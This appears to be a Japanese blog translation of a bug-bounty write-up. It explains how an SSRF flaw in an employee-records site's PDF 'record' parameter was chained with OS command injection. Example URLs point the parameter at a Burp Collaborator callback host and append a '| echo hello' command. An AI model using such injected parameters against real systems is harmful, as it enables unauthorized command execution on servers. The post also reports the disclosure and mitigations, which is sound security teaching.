Shikata Ga Nai

Private? There is no such things.

The story of how I was able to chain SSRF with Command Injection Vulnerabilityを訳してみた

Hello there, ('ω')ノ

 

Command Injection Vulnerability で SSRF をチェーン化できた経緯を。

 

脆弱性:

 SSRF

 OSコマンドインジェクション

 RCE

 

記事:

 https://medium.com/@rajqureshi07/the-story-of-how-i-was-able-to-chain-ssrf-with-command-injection-vulnerability-ef31feb30ea9

 

今回は、コマンド インジェクションの脆弱性を使用して

SSRF 攻撃を連鎖させることができた方法について。

 

SSRF またはサーバーサイド リクエスト フォージェリは、

Web アプリケーションから他のサーバに送信されたリクエストを

攻撃者が操作できる脆弱性で。

攻撃者はこの脆弱性を悪用して、脆弱なサーバに代わってリクエストを作成し、

内部リソースにアクセスできて。

 

コマンド インジェクションは、攻撃者がサーバ上で任意のコマンドを

実行できる脆弱性で。

攻撃者は、ユーザ入力を使用してコマンド文字列を作成するアプリケーションに

悪意のあるコマンドを挿入することにより、この脆弱性を悪用する可能性があって。

 

最近、すべての従業員の記録を保存し、従業員が行ったすべての取引を

保存する機能を備えた従業員記録管理サイトに出会い。

さらに、このサイトでは、ユーザが記録を PDF 形式でダウンロードできて。

 

サイトをテストしているときに、PDF をダウンロードしたときに、

サイトが「record」というパラメータを使用してサーバへの URL を

呼び出していることに気付き。

URL は次のようになり。

 

 https://www.example.com/employeeRecord/?record=XYZ.pdf

 

Burp Suite を使用してこのリクエストを取得し、Burp Collaborator.URL を使用して

「record」パラメータの値を次のように変更すると

Burp Collaboratorで反応を確認できて。

 

https://www.example.com/employeeRecord/?record=http://burpcolaboratorlink.com 

 

次に、次のように URL の末尾にいくつかの Linux コマンドを追加して、

コマンド インジェクションを試みることを考え。

 

https://www.example.com/employeeRecord/?record=http://burpcolaboratorlink.com | echo hello

 

驚いたことに、そのコマンドの結果を Burp Collaborator で取得でき。

これは、SSRF を従業員記録管理サイトのコマンド インジェクションの

脆弱性に連鎖させる方法で。

 

調査結果をすぐにサイトの所有者に報告し、

脆弱性とその影響に関する詳細なレポートを提供して。

 

この脆弱性の解決策は、サーバ側のリクエストで使用する前に、

すべてのユーザ入力を適切に検証してサニタイズすることで。

潜在的な脆弱性の影響を最小限に抑えるために、

サーバ側のコードを実行するユーザの権限を制限することも重要で。

定期的なセキュリティ監査は、攻撃者が悪用する前に脆弱性を特定して

修正するのに役立って。

 

Best regards, (^^ゞ